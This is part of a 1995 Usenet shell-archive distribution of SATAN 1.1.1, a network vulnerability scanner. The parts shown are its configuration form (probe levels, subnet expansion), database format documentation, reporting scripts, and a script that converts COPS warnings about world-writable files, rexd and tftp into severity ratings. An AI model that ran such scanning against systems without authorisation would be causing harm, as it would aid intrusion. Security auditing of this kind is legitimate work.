X {TOK_CASE, "case"},
X {TOK_DEFAULT, "default"},

X {TOK_ENUM, "enum"},
X {TOK_TYPEDEF, "typedef"},
X {TOK_INT, "int"},

X {TOK_SHORT, "short"},
X {TOK_LONG, "long"},

X {TOK_UNSIGNED, "unsigned"},
X {TOK_DOUBLE, "double"},
X {TOK_FLOAT, "float"},
X {TOK_CHAR, "char"},
X {TOK_STRING, "string"},

X {TOK_OPAQUE, "opaque"},
X {TOK_BOOL, "bool"},
X {TOK_VOID, "void"},

X {TOK_PROGRAM, "program"},
X {TOK_VERSION, "version"},
X {TOK_EOF, "??????"}

X};
X
Xstatic char *
Xtoktostr(kind)
X tok_kind kind;
X{
X token *sp;
X
X for (sp = tokstrings; sp->kind != TOK_EOF && sp->kind != kind; sp++);
X return (sp->str);

X}
X
X
X
Xstatic

Xprintbuf()
X{
X char c;
X int i;
X int cnt;
X
X# define TABSIZE 4
X
X for (i = 0; c = curline[i]; i++) {
X if (c == '\t') {
X cnt = 8 - (i % TABSIZE);
X c = ' ';
X } else {
X cnt = 1;
X }
X while (cnt--) {
X (void) fputc(c, stderr);

X }
X }
X}
X
X
Xstatic

Xprintwhere()
X{
X int i;
X char c;
X int cnt;
X
X printbuf();
X for (i = 0; i < where - curline; i++) {
X c = curline[i];
X if (c == '\t') {
X cnt = 8 - (i % TABSIZE);
X } else {
X cnt = 1;
X }
X while (cnt--) {
X (void) fputc('^', stderr);
X }
X }
X (void) fputc('\n', stderr);
X}
END_OF_FILE
if test 7839 -ne `wc -c <'satan-1.1.1/src/rpcgen/rpc_util.c'`; then
echo shar: \"'satan-1.1.1/src/rpcgen/rpc_util.c'\" unpacked with wrong size!
fi
# end of 'satan-1.1.1/src/rpcgen/rpc_util.c'
fi
echo shar: End of archive 7 $of 15$.
cp /dev/null ark7isdone

Wietse Venema

unread,

Apr 13, 1995, 3:00:00 AM4/13/95

Submitted-by: wswi...@wsbs06.win.tue.nl (Wietse Venema)
Posting-number: Volume 47, Issue 132
Archive-name: satan/part08

Environment: UNIX && HTML && Perl 5.0

#! /bin/sh

# This is a shell archive. Remove anything before this line, then feed it
# into a shell via "sh file" or similar. To overwrite existing files,
# type "sh file -c".

# Contents: satan-1.1.1/html/admin/satan_cf_form.pl
# satan-1.1.1/html/docs/satan.db.html
# satan-1.1.1/html/reporting/satan_severity_counts.pl
# satan-1.1.1/perl/cops2satan.pl satan-1.1.1/perl/hosttype.pl
# satan-1.1.1/src/fping/README.VMS satan-1.1.1/src/misc/rex.c
# satan-1.1.1/src/misc/rex.x satan-1.1.1/src/misc/safe_finger.c
# satan-1.1.1/src/rpcgen/rpc_svcout.c
# Wrapped by kent@ftp on Wed Apr 12 20:30:09 1995

PATH=/bin:/usr/bin:/usr/ucb:/usr/local/bin:/usr/lbin:$PATH ; export PATH
echo If this archive is complete, you will see the following message:

echo ' "shar: End of archive 8 (of 15)."'
if test -f 'satan-1.1.1/html/admin/satan_cf_form.pl' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/html/admin/satan_cf_form.pl'\"
else
echo shar: Extracting \"'satan-1.1.1/html/admin/satan_cf_form.pl'\" $5283 characters$
sed "s/^X//" >'satan-1.1.1/html/admin/satan_cf_form.pl' <<'END_OF_FILE'
X#
X# Display a FORM to select default config options to give the user
X# control over the knobs and dials
X
X#
X# First figure out what radio buttons etc. should be "on". Note: the
X# variables below are global. Perhaps we should hide in our own package
X# name space.
X#
X@cf_attack_level = (); $cf_attack_level[$attack_level] = "checked";
X@cf_timeout = (); $cf_timeout[$timeout] = "checked";
X@cf_sub_zero = (); $cf_sub_zero[$sub_zero_proximity] = "checked";
X@cf_attack_proximate = ();
X $cf_attack_proximate[$attack_proximate_subnets] = "checked";
X@cf_dont_nslookup = (); $cf_dont_nslookup[$dont_use_nslookup] = "checked";
X@cf_dont_ping = (); $cf_dont_ping[$dont_use_ping] = "checked";
X@cf_untrusted = (); $cf_untrusted[$untrusted_host] = "checked";
X
Xprint CLIENT <<EOF
X<HTML>
X<HEAD>
X<TITLE>SATAN Configuration Management</TITLE>
X<LINK REV="made" HREF="mailto:satan\@fish.com">

X</HEAD>
X<BODY>
X

X<IMG SRC=$HTML_ROOT/images/satan.gif>
X<H1>SATAN Configuration Management</H1>
X<HR>
X
X<FORM METHOD=POST ACTION=satan_cf_action.pl>
X
X<H2>Scanning levels and timeouts</H2>
X
X<STRONG>What directory should I store the data in?</STRONG>
X<DL compact>
X<DT><DD><INPUT SIZE=25 NAME=satan_data VALUE=$satan_data>
XSatan data directory
X</DL>
X<P>
X
X<STRONG>What probe level should I use?</STRONG>
X<DL compact>
X<DT><DD><INPUT TYPE="radio" NAME=attack_level VALUE=0 $cf_attack_level[0]>
XLight
X<DT><DD><INPUT TYPE="radio" NAME=attack_level VALUE=1 $cf_attack_level[1]>
XNormal
X<DT><DD><INPUT TYPE="radio" NAME=attack_level VALUE=2 $cf_attack_level[2]>
XHeavy
X</DL>
X
X<P>
X<STRONG>What timeout values should I use?</STRONG>
X<DL compact>
X<DT><DD><INPUT SIZE=3 NAME=long_timeout VALUE=$long_timeout> Slow
X<DT><DD><INPUT SIZE=3 NAME=med_timeout VALUE=$med_timeout> Medium
X<DT><DD><INPUT SIZE=3 NAME=short_timeout VALUE=$short_timeout> Fast
X</DL>
X
X<P>
X<STRONG>What signal should I send to kill a tool process when it times out?</STRONG>
X<DL compact>
X<DT><DD><INPUT SIZE=3 NAME=timeout_kill VALUE=$timeout_kill>Kill signal
X</DL>
X
X<P>
X<STRONG>How far out from the original target should I probe?</STRONG>
X(Under no circumstances should this be higher than "2" unless you're
XPOSITIVE you know what you're doing!)
X<DL compact>
X<DT><DD><INPUT SIZE=3 NAME=max_proximity_level VALUE=$max_proximity_level>
XMaximal proximity
X</DL>
X
X<P>
X<STRONG>As I move out to less proximate hosts, how much should I drop
Xthe probe level?</STRONG>
X<DL compact>
X<DT><DD><INPUT SIZE=3 NAME=proximity_descent VALUE=$proximity_descent>
XProximity descent
X</DL>
X
X<P>
X<STRONG>When I go below 0 probe level, should I:</STRONG>
X<DL compact>
X<DT><DD><INPUT TYPE="radio" NAME=sub_zero_proximity VALUE=0 $cf_sub_zero[0]>Stop
X<DT><DD><INPUT TYPE="radio" NAME=sub_zero_proximity VALUE=1 $cf_sub_zero[1]>Go on
X</DL>
X
X<P>
X<STRONG>Should I do subnet expansion; that is, should I probe just the
Xtarget or its entire subnet?</STRONG>
X<DL compact>
X<DT><DD><INPUT TYPE="radio" NAME=attack_proximate_subnets VALUE=0
X $cf_attack_proximate[0]>Just the target
X<DT><DD><INPUT TYPE="radio" NAME=attack_proximate_subnets VALUE=1
X $cf_attack_proximate[1]>The entire subnet
X</DL>
X
X<P>
X<STRONG>Does $THIS_HOST appear in <i>rhosts, hosts.equiv</i> or
X<i>NFS exports</i> files of hosts being probed?
X</STRONG>
X
X<DL compact>
X<DT><DD><INPUT TYPE="radio" NAME=untrusted_host VALUE=0 $cf_untrusted[0]>
XYou are running SATAN from a possibly trusted host
X<DT><DD><INPUT TYPE="radio" NAME=untrusted_host VALUE=1 $cf_untrusted[1]>
XYou are running SATAN from an untrusted host
X</DL>
X
X<HR>
X
X<h2>Patterns specifying hosts to limit the probe to</h2>
X
XIf you only want to probe hosts within a specific domain, you could use,
Xfor example:
X<PRE>
X podunk.edu
X</PRE>
X<p>
XIf you only want to probe sites on a particular subnet, you could use,
Xfor example:
X<PRE>
X 192.9.9
X</PRE>
X<p>
X<INPUT SIZE=48 NAME=only_attack_these VALUE="$only_attack_these">
X<p>
XYou can specify multiple shell-like patterns, separated by whitespace
Xor commas, and you may mix networks and domains. A host will be
Xscanned when it matches <i>any</i> pattern: either a network number prefix
Xor an internet domain suffix.
X
X<hr>
X
X<h2>Patterns specifying hosts to NOT probe</h2>
X
XIf you don't want to probe any military or governmental sites, you could use:
X<PRE>
X mil, gov
X</PRE>
X<p>
X<INPUT SIZE=48 NAME=dont_attack_these VALUE="$dont_attack_these">
X<p>
XYou can specify multiple shell-like patterns, separated by whitespace
Xor commas, and you may mix networks and domains. A host will be
Xskipped when it matches <i>any</i> pattern: either a network number prefix
Xor an internet domain suffix.
X
X<hr>
X
X<H2>Workarounds for broken DNS, ICMP etc.</H2>
X
X<DL compact>
X<DT><DD><INPUT TYPE="radio" NAME="dont_use_nslookup" VALUE="0" $cf_dont_nslookup[0]>
XUse <i>nslookup</i> to look up fully-qualified (<i>host.domain</i>) host names
X<DT><DD><INPUT TYPE="radio" NAME="dont_use_nslookup" VALUE="1" $cf_dont_nslookup[1]>
XDon't use <i>nslookup</i>: DNS is unavailable.
X</DL>
X
X<DL compact>
X<DT><DD><INPUT TYPE="radio" NAME="dont_use_ping" VALUE="0" $cf_dont_ping[0]>
XPing hosts to see if they are alive (skip non-responding hosts).
X<DT><DD><INPUT TYPE="radio" NAME="dont_use_ping" VALUE="1" $cf_dont_ping[1]>
XDon't ping hosts: ICMP does not work.
X</DL>
X
X<HR>
X<INPUT TYPE="submit" VALUE="Change the configuration file">
X</FORM>

X</BODY>
X</HTML>
XEOF

END_OF_FILE
if test 5283 -ne `wc -c <'satan-1.1.1/html/admin/satan_cf_form.pl'`; then
echo shar: \"'satan-1.1.1/html/admin/satan_cf_form.pl'\" unpacked with wrong size!
fi
# end of 'satan-1.1.1/html/admin/satan_cf_form.pl'
fi
if test -f 'satan-1.1.1/html/docs/satan.db.html' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/html/docs/satan.db.html'\"
else
echo shar: Extracting \"'satan-1.1.1/html/docs/satan.db.html'\" $5424 characters$
sed "s/^X//" >'satan-1.1.1/html/docs/satan.db.html' <<'END_OF_FILE'
X<HTML>
X<HEAD>
X<title>SATAN Database Format</title>

X<LINK REV="made" HREF="mailto:sa...@fish.com">
X</HEAD>
X<BODY>

X<H1><IMG SRC="../images/satan.gif" ALT="[SATAN IMAGE]">SATAN Database Format</H1>
X<HR>
X
XThere are three main databases in SATAN:
X<UL>
X<LI><A HREF="#facts"><strong>facts</strong> - just the facts, m'am</a>
X<LI><A HREF="#all-hosts"><strong>all-hosts</strong> - all the hosts seen</A>
X<LI><A HREF="#todo"><strong>todo</strong> - all the things it did </a>
X</UL>
X
X
X<A name="facts"></a><H2>The "facts" database</H2>
XAll information is in the form of text records with attributes
Xdescribed below; there are seven fields, each separated by a pipe
X("|") character.
X<p>
XThis information is what is collected by SATAN's dumb data collection
Xtools - no intelligence used, they just do what they're told to do.
X<p>
XInferences and conclusions are in the same format; the fields are:
X<OL>
X<LI> <A HREF="#Target">Target</A>
X<LI> <A HREF="#Service">Service</A>
X<LI> <A HREF="#Status">Status</A>
X<LI> <A HREF="#Severity">Severity</A>
X<LI> <A HREF="#Trusted">Trusted</A>
X<LI> <A HREF="#Trustee">Trustee</A>
X<LI> <A HREF="#Canonical">Canonical Service Output</A>
X<LI> <A HREF="#Text">Text</A>
X</OL>
X
X<A NAME="Target"><H3>Target</H3></A>
X
XName of host that the record refers to. In order of preference,
Xit uses FQDN, IP, estimated, or partial. Partial can result from
Xservice output getting truncated; e.g. finger can return
X<I>"foo.bar.co"</I>; is that <I>"foo.bar.com"</I>, or something
Xlonger? SATAN tries to figure this out, but obviously can't always be
Xright.
X
X<A NAME="Service"><H3>Service</H3></A>
X
XThe basename of tool, with the <I>".satan"</I> suffix removed.
XIn the case of tools that probe multiple services (such as
X<em>rpcinfo</em> or the portscanner), the name of the service being
Xprobed.
X
X<A NAME="Status"><H3>Status</H3></A>
X
XThis tells us if the host was reachable, if it timed out, or whatever.
XThe codes and what they mean are:
X<OL>
X<LI><I>a</I>: <STRONG>available</STRONG>
X<LI><I>u</I>: <STRONG>unavailable (e.g. timeout)</STRONG>
X<LI><I>b</I>: <STRONG>bad (e.g. unable to resolve)</STRONG>
X<LI><I>x</I>: <STRONG>look into further?</STRONG>
X</OL>
X
X<A NAME="Severity"><H3>Severity</H3></A>
X
XHow serious was the vulnerability? The codes are:
X<OL>
X<LI> <I>rs</I>: <STRONG>host</STRONG> or <STRONG>root</STRONG> access to the target.
X<LI> <I>us</I>: <STRONG>user shell access</STRONG>
X<LI> <I>ns</I>: <STRONG>nobody shell access</STRONG>
X<LI> <I>uw</I>: <STRONG>user file write</STRONG>
X<LI> <I>nr</I>: <STRONG>nobody file read</STRONG>
X</OL>
X
X<A NAME="Trustee"><H3>Trustee</H3></A>
X
XThis is who trusts another target. It is denoted by two tokens separated
Xby an at sign (<I>"@"</I>). The left part is the user :
X<OL>
X<LI> <I>user</I>: <STRONG> a particular user on the host is trusted</STRONG>
X<LI> <I>root</I>: <STRONG> only root is trusted</STRONG>
X<LI> <I>nobody</I>: <STRONG> user nobody on the host is trusted</STRONG>
X<LI> <I>ANY</I>: <STRONG> any arbitrary user on the host is trusted</STRONG>
X</OL>
XThe right part of the trust field is the host that is trusted - it is
Xeither the <I>target</I> or <I>ANY</I>, which refers to any host on
Xthe Internet.
X<p>
X<A NAME="Trusted"><STRONG>Trusted</STRONG></A>
XThis is who is the <I>trustee</I> trusts. It is denoted by two tokens
Xseparated by an at sign (<I>"@"</I>), and it uses the same format the
Xthe <A HREF="#Trustee"><I>"trustee"</I></A> field.
X
X<A NAME="Canonical"><H3>Canonical Service Output</H3></A>
X
XIn the case of non-vulnerability records,
Xthis is a reformatted version of the network service; the format is
Xeither <I>"user name, home dir, last login"</I> or
X<I>"filesys, clients"</I>.
XIn the case of vulnerability records, this is a description of the
Xproblem type. SATAN uses this name in reports by vulnerability type,
Xand uses it to locate the corresponding vulnerability tutorial.
X
X<A NAME="Text"><H3>Text</H3></A>
X
XThis is a place to put english (or other languages)-like messages
Xthat can be outputted in the final report.
X</OL>
X
X
X<A name="all-hosts"><H2>"all-hosts" - all the hosts seen database</h2></A>
XThe <i>all-hosts</i> database keeps track of what hosts SATAN has seen, in
Xany way, shape, or form, while scanning networks, including hosts that
Xmay or may not exist. (Non-existant hosts might include, for instance,
Xhosts reported from the output of the <i>showmount</i> command.
XThe database is an ASCII file, with six (6) fields separated by a
Xpipe ("|") character, whose attributes are:
X<ul>
X<li>IP address of the host
X<li>The proximity level from the original target
X<li>The attack level the host has been probed with
X<li>Was subnet expansion on? (1 = yes, 0 = no)
X<li>What time was the scan done?
X</ul>
X(See the <a href="satan.cf.html">SATAN configuration file</a> documentation
Xfor more information on these variables and concepts.)
X
X<A name="todo"><H2>"todo" - database that tracks probes already done</h2></a>
X<p>
XThe <i>todo</i> database keeps track of what probes have already been done.
XIt's in the form of text records with attributes described below;
Xthere are three fields, each separated by a pipe ("|") character:
X
X<ul>
X<li>The hostname
X<li>The name of the tool that is to be run next
X<li>Any arguments for the tool
X</ul>
XThe tools perform <i>.satan</i> probes against the <i>hostname</i> with
Xthe arguments, if any.
X
X<hr>

X<a href="satan_reference.html"> Back to the Reference TOC/Index</a>
X

X</BODY>
X</HTML>
END_OF_FILE

if test 5424 -ne `wc -c <'satan-1.1.1/html/docs/satan.db.html'`; then
echo shar: \"'satan-1.1.1/html/docs/satan.db.html'\" unpacked with wrong size!
fi
# end of 'satan-1.1.1/html/docs/satan.db.html'
fi
if test -f 'satan-1.1.1/html/reporting/satan_severity_counts.pl' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/html/reporting/satan_severity_counts.pl'\"
else
echo shar: Extracting \"'satan-1.1.1/html/reporting/satan_severity_counts.pl'\" $727 characters$
sed "s/^X//" >'satan-1.1.1/html/reporting/satan_severity_counts.pl' <<'END_OF_FILE'
X#
X# Sort hosts by number of vulnerabilties.
X#
X&make_severity_info();
X
Xprint CLIENT <<EOF;
X<HTML>
X<HEAD>
X<title> Vulnerabilities - By Counts </title>
X<LINK REV="made" HREF="mailto:satan\@fish.com">
X</HEAD>
X<BODY>
X<H1><IMG SRC=$HTML_ROOT/images/satan.gif> Vulnerabilities - By Counts </H1>
X<hr>
X<h3> Hosts by descending vulnerability counts. </h3>
XEOF
X
X$_sort_order = "severity";
X@_hosts = keys %severity_host_count;
Xdo "$html_root/reporting/sort_hosts.pl";
Xprint CLIENT $@ if $@;
X
Xprint CLIENT <<EOF
XNo vulnerability information found.
XEOF
X if @_hosts == 0;
X
Xprint CLIENT <<EOF;
X<hr> <a href=$HTML_STARTPAGE> Back to the SATAN start page </a> |
X<a href=analysis.pl> Back to SATAN Reporting and Analysis </a>
X</BODY>
X</HTML>
XEOF
END_OF_FILE
if test 727 -ne `wc -c <'satan-1.1.1/html/reporting/satan_severity_counts.pl'`; then
echo shar: \"'satan-1.1.1/html/reporting/satan_severity_counts.pl'\" unpacked with wrong size!
fi
# end of 'satan-1.1.1/html/reporting/satan_severity_counts.pl'
fi
if test -f 'satan-1.1.1/perl/cops2satan.pl' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/perl/cops2satan.pl'\"
else
echo shar: Extracting \"'satan-1.1.1/perl/cops2satan.pl'\" $5562 characters$
sed "s/^X//" >'satan-1.1.1/perl/cops2satan.pl' <<'END_OF_FILE'
X#!/usr/local/bin/perl5
X#
X# An experimental script that will Convert a COPS warning report
X# into SATAN rules. Take stdin or a filename. Uses the function
X# "satan_print" to emit SATAN rules.
X#
X
Xrequire "perl/hostname.pl";
Xrequire "perl/misc.pl";
X
X# we're the target... nothing remote here
X$target = &hostname();
X
X#
X# default value for satan_print(); everything we report is "available"
X$status = "a";
X
X# most things only affect users on the machine
X$trusted = "ANY@$target";
X
X# most things will be blank here, at least on my first shot at this...
X$service_ouput = "";
X
X# ok, process everything now:
Xwhile (<>) {
X
X # chow down on blank lines
X if ($_ =~ /^\s*$/) { next; }
X
X # top three lines look like:
X #
X # ATTENTION
X # Security Report for...
X # from host ...
X if ($_ =~ /from host/) { $start_processing = 1; next; }
X if (!$start_processing) { next; }
X
X # get the service, if possible --
X # assumes all checks print out something like:
X # "**** foo.chk ****"
X # when the verbose flag is true
X if ($_ =~ /^\*\*\*\*/) {
X ($service) = ($_ =~ /\*\*\*\* (\S+) /);
X next;
X }
X
X # IMPORTANT - exception list!
X #
X # Be very careful of regular expressions and other meta stuff...
X # ()'s, *'s, ?'s, /'s, etc. are all trouble. Backquote if in doubt.
X #
X # Sample list:
X #
X # Hassled by mail warning?
X # next if (m@Warning! /usr/spool/mail is _World_ writable!@);
X #
X # Running an NIS-free machine but in an NIS environment?
X # next if (/YG/);
X # next if (/YP/);
X
X # if it doesn't start with "Warning!", then nuke the second
X # line; it's a multipart print
X next unless ($_ =~ /^Warning!/);
X
X #
X # START THE CHECKING
X #
X # level 0 checks -- the most serious
X #
X if ($_ =~ /A "+" entry in/) {
X $severity = "us";
X $trusted = "ANY@ANY";
X $trustee = "ANY@$target";
X $text = "+ in /etc/hosts.equiv file";
X }
X
X # Assume bugs are all bad -- some bugs are remote; need to
X # change this to recognize them...
X elsif (m@ould have a hole/bug@) {
X $severity = "rs";
X $trusted = "ANY@$target";
X $trustee = "root@$target";
X $text = "serious bug";
X }
X
X # kuang telling us we're in deep yoghurt, or something like that...
X elsif ($_ =~ /DO ANYTHING/) {
X $severity = "rs";
X $trusted = "ANY@$target";
X $trustee = "root@$target";
X $text = "kuang found a path to compromise root";
X }
X
X # writable password file really sucks:
X elsif ($_ =~ /\/etc\/passwd.*_World_/) {
X $severity = "rs";
X $trusted = "ANY@$target";
X $trustee = "root@$target";
X $text = "world-writable password file";
X }
X
X # this is easy root most of the time...
X elsif ($_ =~ /Directory.*is _World_ writable and in roots path!/) {
X $severity = "rs";
X $trusted = "ANY@$target";
X $trustee = "root@$target";
X $text = "world-writable file in root's path";
X }
X
X # level 1 checks:
X #
X elsif ($_ =~ /uudecode is suid!/) {
X $severity = "uw"; # cops should tell us *what* user, eh?
X $trusted = "ANY@$target";
X $trustee = "user@$target";
X $text = "uudecode is suid";
X }
X elsif ($_ =~ /rexd is enabled in/) {
X $severity = "us";
X $trusted = "ANY@ANY";
X $trustee = "user@$target";
X $text = "rexd is enabled";
X }
X elsif ($_ =~ /User.*mode/ && $_ !~ /is not a directory/) {
X $severity = "us";
X $trusted = "ANY@$target";
X $trustee = "user@$target";
X $text = "User home directory or startup file is writable";
X }
X elsif ($_ =~ /tftp is enabled on/) {
X $severity="nr";
X $trustee="nobody@$target";
X $trusted="ANY@ANY";
X $text="tftp is enabled";
X $text = "tftp is enabled on";
X &satan_print();
X # (OUTPUT TWICE)
X $severity="nw";
X $trustee="nobody@$target";
X $trusted="ANY@ANY";
X $text = "tftp is enabled on";
X }
X elsif ($_ =~ /uudecode is enabled in/) {
X $severity = "nw";
X $trustee="nobody@$target";
X $trusted="ANY@ANY";
X $text = "uudecode is enabled in/";
X }
X # unclear what ramifications are...
X # /Password file, line.*is blank/
X # /Password file, line.*nonnumeric user id:/
X elsif ($_ =~ /(in cron_file) is World writable!/) {
X $severity = "root";
X $trusted = "ANY@$target";
X $trustee = "root@$target";
X $status = "q"; # who knows if it really matters?
X $text = "File in cron_file is world writable";
X }
X elsif ($_ =~ /File.*(inside root executed file) is _World_ writable!/) {
X $severity = "root";
X $trusted = "ANY@$target";
X $trustee = "root@$target";
X $status = "q"; # who knows if it really matters?
X $text = "File inside root executed file is _World_ writable!";
X }
X elsif ($_ =~ /File.*(in .*) is _World_ writable!/) {
X $severity = "user";
X $trusted = "ANY@$target";
X $trustee = "root@$target";
X $status = "q"; # who knows if it really matters?
X $text = "File inside important command is _World_ writable!";
X }
X # this assumes anon-ftp is actually on!
X elsif ($_ =~ /ftp's home directory should not be/) {
X $severity = "nw";
X $trusted = "ANY@ANY";
X $trustee = "nobody@$target";
X $text = "ftp's home directory is /";
X &satan_print();
X # (OUTPUT TWICE)
X $severity = "nr";
X $trusted = "ANY@ANY";
X $trustee = "nobody@$target";
X $text = "ftp's home directory is /";
X }
X # this gives away password file; what do we do?
X # elsif (/and.*ass.*are the same/)
X # $text = "system password file and ~ftp/etc/passwd are the same";
X
X # unclear of ramifications; could be very bad or ok
X # elsif (/should be mode 555/)
X
X # rhosts entry in ftp...
X # elsif (/should be be empty/)
X
X # PRINT *SOMETHING* if can't find anything... give it no
X # severity so it won't get counted...
X else {
X $severity = "";
X $trusted = "";
X $trustee = "";
X $status = "a";
X ($text) = /Warning!\s+(.+)$/;
X # $text = "Unknown warning!";
X }
X
X
X &satan_print();
X }
X
END_OF_FILE
if test 5562 -ne `wc -c <'satan-1.1.1/perl/cops2satan.pl'`; then
echo shar: \"'satan-1.1.1/perl/cops2satan.pl'\" unpacked with wrong size!
fi
chmod +x 'satan-1.1.1/perl/cops2satan.pl'
# end of 'satan-1.1.1/perl/cops2satan.pl'
fi
if test -f 'satan-1.1.1/perl/hosttype.pl' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/perl/hosttype.pl'\"
else
echo shar: Extracting \"'satan-1.1.1/perl/hosttype.pl'\" $4802 characters$
sed "s/^X//" >'satan-1.1.1/perl/hosttype.pl' <<'END_OF_FILE'
X#
X# infer_hosttype - classify host by banner, the dns HINFO record may be wrong.
X# Output to:
X#
X# $hosttype{$target} operating system type per host
X# $sysclass{$type} OS class that an OS type belongs to
X# $hosttype_flag (*)
X# $systype_counts{type} number of hosts per OS type
X# $systype_severities{type} ditto, with at least one vulnerability
X# $sysclass_counts{class} number of hosts per OS class
X# $sysclass_severities{class} ditto, with at least one vulnerability
X# $hosts_by_systype{type} string with hosts per OS type
X# $systypes_by_class{class} string with OS types per OS class
X#
X# (*) Is reset whenever the $hosttype etc. tables are updated. To recalculate,
X# invoke make_hosttype_info_flag().
X#
X# Standalone usage: perl hosttype.pl [satan_record_files...]
X#
X
X$hosttype_files = "rules/hosttype";
X$hosttype_unknown = "unknown type";
X$hosttype_notprobed = "not scanned";
X
Xsub build_infer_hosttype {
X local($files) = @_;
X local($type, $code, $file, $cond, $type, $class);
X
X $code = "sub infer_hosttype {\n";
X $code .= "\tlocal(\$type);\n";
X $code .= "\tif (\$service !~ /^(smtp|telnet|ftp)\$/) {\n\t\treturn;\n\t}\n";
X $class = "other";
X
X foreach $file (split(/\s+/, $files)) {
X open(RULES, $file) || die "cannot open $file: $!";
X while (<RULES>) {
X chop;
X while (/\\$/) {
X chop;
X $_ .= <RULES>;
X chop;
X }
X s/#.*$//;
X s/\s+$//;
X next if /^$/;
X if (/^CLASS\s+(.+)/i) {
X $class = $1;
X } else {
X s/\bUNKNOWN\b/(HOSTTYPE eq "" || HOSTTYPE eq \"$hosttype_unknown\" || HOSTTYPE eq \"$hosttype_notprobed\")/;
X s/\bHOSTTYPE\b/\$hosttype{\$target}/g;
X s/@/\\@/g;
X ($cond, $type) = split(/\t+/, $_, 2);
X $type = "\$1" if ($type eq "");
X $code .= "\
X if ($cond) {
X \$type = $type;
X \$hosttype{\$target} = \$type;
X \$sysclass{\$type} = \"$class\";
X \$hosttype_flag = 0;

X return;
X }
X";
X }

X }
X close(RULES);
X }
X $code .= "\t\$hosttype{\$target} = \"\"
X if !exists(\$hosttype{\$target});\n}";
X return $code;
X}
X
X#
X# Generate hosttype-dependent statistics.
X#
Xsub make_hosttype_info {
X local($host, $class, $type, $count);
X
X if ($hosttype_flag > 0) {
X return;
X }
X $hosttype_flag = time();
X
X print "Rebuild host type statistics...\n" if $debug;
X &make_severity_info();
X
X %hosts_by_systype = ();
X %systypes_by_class = ();
X %systype_severities = ();
X %systype_counts = ();
X %sysclass_severities = ();
X %sysclass_counts = ();
X
X for $host (keys %all_hosts) {
X $hosttype{$host} = $hosttype_unknown
X if ($host && $hosttype{$host} eq "" && &get_host_time($host) > 1);
X $hosttype{$host} = $hosttype_notprobed
X if ($host && $hosttype{$host} eq "");
X }
X $sysclass{$hosttype_unknown} = "other";
X $sysclass{$hosttype_notprobed} = "other";
X
X for $type (sort keys %sysclass) {
X $systype_severities{$type} = 0;
X $sysclass_severities{$sysclass{$type}} = 0;
X }
X for $host (sort keys %hosttype) {
X $type = $hosttype{$host};
X if ($type eq "") {
X $type = $hosttype{$host} = $hosttype_unknown;
X }
X if (exists($severity_host_type_info{$host})) {
X $systype_severities{$type}++;
X }
X $hosts_by_systype{$type} .= $host . "\n";
X $systype_counts{$type}++;
X }
X
X for $type (sort keys %sysclass) {
X if (($count = $systype_counts{$type}) > 0) {
X $class = $sysclass{$type};
X $systypes_by_class{$class} .= $type . "\n";
X $sysclass_counts{$class} += $count;
X if ($systype_severities{$type}) {
X $sysclass_severities{$class} += $systype_severities{$type};
X }
X } else {
X delete($sysclass{$type});
X }
X }
X}
X
X#
X# Reset the host type tables.
X#
Xsub clear_hosttype_info {
X %hosttype = ();
X %systype = ();
X %hosts_by_systype = ();
X %systypes_by_class = ();
X %systype_severities = ();
X %systype_counts = ();
X %sysclass_severities = ();
X %sysclass_counts = ();
X $hosttype_flag = 0;
X}
X
X#
X# Some scaffolding for stand-alone operation
X#
Xif ($running_under_satan) {
X eval &build_infer_hosttype($hosttype_files);
X die "error in $hosttype_files: $@" if $@;
X} else {
X $running_under_satan = -1;
X $debug = 1;
X
X require 'perl/misc.pl';
X
X #
X # Generate code from rules files.
X #
X $code = &build_infer_hosttype($hosttype_files);
X print "Code generated from $hosttype_files:\n\n";
X print $code;
X eval $code;
X die "error in $hosttype_files: $@" if $@;
X
X #
X # Apply rules.
X #
X print "\nApplying rules to all SATAN records...\n";
X while (<>) {
X chop;
X if (&satan_split($_) == 0) {
X &infer_hosttype();
X }
X }
X &make_hosttype_info();
X for (sort keys %hosttype) {
X print "$hosttype{$_} $_\n";
X }
X print "Host class information:\n";
X for $class (sort keys %systypes_by_class) {
X print "$class ";
X print join(' ', split(/\n/, $systypes_by_class{$class}));
X print "\n";

X }
X}
X
X1;
END_OF_FILE

if test 4802 -ne `wc -c <'satan-1.1.1/perl/hosttype.pl'`; then
echo shar: \"'satan-1.1.1/perl/hosttype.pl'\" unpacked with wrong size!
fi
# end of 'satan-1.1.1/perl/hosttype.pl'
fi
if test -f 'satan-1.1.1/src/fping/README.VMS' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/src/fping/README.VMS'\"
else
echo shar: Extracting \"'satan-1.1.1/src/fping/README.VMS'\" $5510 characters$
sed "s/^X//" >'satan-1.1.1/src/fping/README.VMS' <<'END_OF_FILE'
XFrom <@jessica.stanford.edu:IVER...@VSFYS1.FI.UIB.NO> Mon Jul 27 08:54:26 1992
XReceived: from Argus.Stanford.EDU by jessica.stanford.edu (5.59/25-eef) id AA28695; Mon, 27 Jul 92 08:54:22 PDT
XReceived: from vsfys1.fi.uib.no by Argus.Stanford.EDU (5.65/inc-1.0)
X id AA28942; Mon, 27 Jul 92 08:54:19 -0700
XDate: Mon, 27 Jul 1992 17:54:17 +0200
XFrom: IVE...@VSFYS1.FI.UIB.NO (Per Steinar Iversen, Dept. of Physics, Univ. of Bergen, Norway, phone +47-5-212770)
XMessage-Id: <9207271754...@VSFYS1.FI.UIB.NO>
XSubject: FPING under VMS
XTo: sche...@Stanford.EDU
XX-Vmsmail-To: SMTP%"sche...@Stanford.EDU"
XStatus: OR
X
XHello,
X
XI rather liked your recently posted fping, and I decided to port it to VMS,
Xunder MultiNet TCP/IP 3.0H and VAXC 3.2. Only some very minor modifications are
Xnecessary to run it under VMS 5.5:
X
X1) The 2 following lines must be put onto one single line, otherwise VAXC
Xcomplains:
X

X#if !__STDC__ && !defined(__cplusplus) && !defined(FUNCPROTO) \
X && !defined(_POSIX_SOURCE)
X

Xgoes to:
X
X#if !__STDC__ && !defined(__cplusplus) && !defined(FUNCPROTO) && !defined(_POSIX_SOURCE)
X
X2) The single following line must be changed:
X
Xextern char *sys_errlist[];
X
Xto:
X
X#ifndef VMS
Xextern char *sys_errlist[];
X#else
Xextern noshare char *sys_errlist[];
